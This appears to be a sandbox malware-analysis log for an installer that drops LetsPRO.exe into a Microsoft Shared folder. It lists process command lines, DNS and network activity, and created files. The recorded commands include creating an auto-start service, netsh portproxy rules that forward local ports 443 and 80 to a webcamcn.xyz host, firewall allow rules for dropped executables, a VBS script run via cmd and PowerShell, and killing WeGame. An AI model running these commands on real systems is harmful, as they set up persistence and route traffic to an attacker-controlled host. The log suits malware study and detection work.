"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\system32\cmd.exe
cmd /c cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe cscript C:\Users\Admin\57296\572960.vbs
C:\Windows\system32\sc.exe
sc create 572960607 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 572960607
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=443 connectaddress=103.214.147.31.webcamcn.xyz connectport=443
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
C:\Windows\system32\taskkill.exe
taskkill /f /t /im wegame.exe
C:\Windows\system32\taskkill.exe
taskkill /f /t /im WeGame.exe
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | | tcp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | | tcp |
| N/A | 127.0.0.1:443 | | tcp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | | tcp |
| N/A | 127.0.0.1:443 | | tcp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
Files
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi
C:\Windows\Installer\MSI7465.tmp
\??\Volume{8ccc3c3f-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{d6b7a98f-f584-4203-bc19-c25c9403d0b2}_OnDiskSnapshotProp
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install1.cab
C:\Windows\Installer\MSI7A62.tmp
C:\Windows\Installer\MSI7B7C.tmp
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcr100.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\1
C:\Config.Msi\e5773bc.rbs
C:\Users\Admin\57296\572960.vbs
C:\Windows\Temp\__PSScriptPolicyTest_053wmv3v.poa.ps1
C:\Program Files (x86)\WeGame\WeGame.exe
C:\Program Files (x86)\WeGame\adapt_for_imports.dll
C:\Program Files (x86)\WeGame\common.dll
C:\Program Files (x86)\WeGame\beacon_sdk.dll
C:\Program Files (x86)\WeGame\Lua51.dll